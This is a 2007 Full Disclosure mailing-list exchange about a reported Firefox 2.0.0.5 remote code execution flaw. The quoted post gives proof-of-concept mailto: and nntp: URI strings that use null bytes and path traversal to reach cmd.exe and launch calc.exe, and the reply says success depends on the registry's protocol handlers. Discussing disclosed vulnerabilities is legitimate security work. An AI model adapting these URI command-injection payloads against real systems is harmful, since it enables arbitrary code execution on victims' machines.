|
Full Disclosure
mailing list archives
Re: FIREFOX 2.0.0.5 new vulnerability
From: "Nate McFeters" <nate.mcfeters () gmail com>
Date: Wed, 25 Jul 2007 08:45:28 -0400
Check out our blog on xs-sniper.com. There's more info there. This
flaw does somewhat depend upon what you have installed, as is
referenced on our blog page. Keep in mind that the URI's are tied to
commands thru the registry, and that those commands are where the
command injections go. If you have a different command from what we
have, then of course there's the chance it doesn't work.
Thanks,
Nate
On 7/25/07, Mesut EREN <meren () basakkiremit com tr> wrote:
Hi all,
FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5. But
don't work is code.
Example code is
mailto:%00%00../../../../../../windows/system32/cmd".exe
../../../../../../../../windows/system32/calc.exe " - "
blah.bat
nntp:%00%00../../../../../../windows/system32/cmd".exe
../../../../../../../../windows/system32/calc.exe " - "
blah.bat
Where i missing?
Mesut EREN
BAŞAK ÇATI & CEPHE SİSTEMLERİ
Bilgi İşlem Sorumlusu
MCSA:S,MCSE:S,CEH,CCNA
meren () basakkiremit com tr
_______________________________________________
Full-Disclosure - We believe in it.
Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
| 
Intro
